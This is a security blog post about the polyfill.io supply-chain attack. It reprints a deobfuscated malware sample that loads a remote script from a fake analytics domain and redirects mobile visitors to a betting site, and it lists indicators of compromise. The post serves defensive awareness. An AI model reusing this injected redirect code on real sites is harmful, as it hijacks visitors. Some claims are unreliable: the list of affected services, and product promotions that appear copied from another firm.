Polyfill - A new attack vector we should look out for

At Hepton.uk, we prioritize our clients’ cybersecurity and continuously monitor emerging threats. Recently, a new attack vector has emerged through a well-known JavaScript library, Polyfill.js, which has raised concerns within the tech community. Here’s what you need to know.

The Polyfill.js Scenario

Polyfill.js is a popular open-source library designed to support older browsers, used by over 100,000 websites. High-profile users include JSTOR, Intuit, and the World Economic Forum. The library was traditionally hosted on the domain cdn.polyfill.io. However, in February of this year, a Chinese company acquired the domain and the associated GitHub account.

Since this acquisition, the domain has been used to inject malware into mobile devices via any site that embeds the Polyfill script from cdn.polyfill.io. Despite complaints, these issues have been swiftly removed from the GitHub repository, as captured in archived reports.

Understanding the Malware

The Polyfill code dynamically generates content based on HTTP headers, creating multiple potential attack vectors. Sansec, a security firm, decoded a particular malware that redirects mobile users to a sports betting site through a fake Google Analytics domain (www.googie-anaiytics.com).

This malicious code is sophisticated, employing several layers of protection against reverse engineering. It activates only on specific mobile devices at certain hours and deactivates upon detecting an admin user or the presence of web analytics services, likely to avoid detection in site statistics.

Example of the Malicious Payload

For readability, some names in the original code have been modified. However, the term “tiaozhuan,” meaning “jump” in Chinese, originates from the malware.

function isPc() {
  try {
    var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" || navigator.platform == "Macintosh" || navigator.platform == "MacIntel";
    return _isMac || _isWin;
  } catch (_0x44e1f6) {
    return false;
  }
}

function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
      if (usercache == true) {
        window.location.href = _0x5ae1f8;
      }
    });
}

function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();

    if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_hours >= 0 && _hours < 2) {
      if (_rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_hours >= 2 && _hours < 4) {
      if (_rnd <= 15) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_hours >= 4 && _hours < 7) {
      if (_rnd <= 20) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_hours >= 7 && _hours < 8) {
      if (_rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_rnd <= 10) {
      _redirectURL = _kuurzaBitGet;
    }

    if (_redirectURL !== "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
      vfed_update(_redirectURL);
    }
  }
}

Indicators of Compromise

https://kuurza.com/redirect?from=bitget https://www.googie-anaiytics.com/html/checkcachehw.js https://www.googie-anaiytics.com/ga.js https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js https://union.macoms.la/jquery.min-4.0.2.js https://newcrbpc.com/redirect?from=bscbc

One of the biggest services affected by this malware is Hulu (www.hulu.com) and cloudfalre (www.cloudflare.com).

Quick Fix & consequences

sansec.io was DDoS as they were the first one to report this malware leading to a temporary outage of their website. Soon after, Gogle started blocking Ads for eCommerce sites that were using Polyfill.js.

Later on, Cloudflare adding a quick fix which implemented real-time rewrites of “cdn.polyfill.io” to their own version of the script.

Recommendations

The original Polyfill author has advised against using Polyfill altogether, citing that modern browsers no longer require it. However, for those still in need of such functionality, trustworthy alternatives are available from Fastly and Cloudflare.

This incident exemplifies a supply chain attack, where vulnerabilities are introduced through third-party components. To safeguard your systems, consider using our free CSP monitoring service, Sansec Watch, to gain visibility into the code your users are loading.

Additionally, our eComscan backend scanner has been updated to detect the presence of polyfill.io, ensuring your site’s security against such threats.

Sources

https://sansec.io/research/polyfill-supply-chain-attack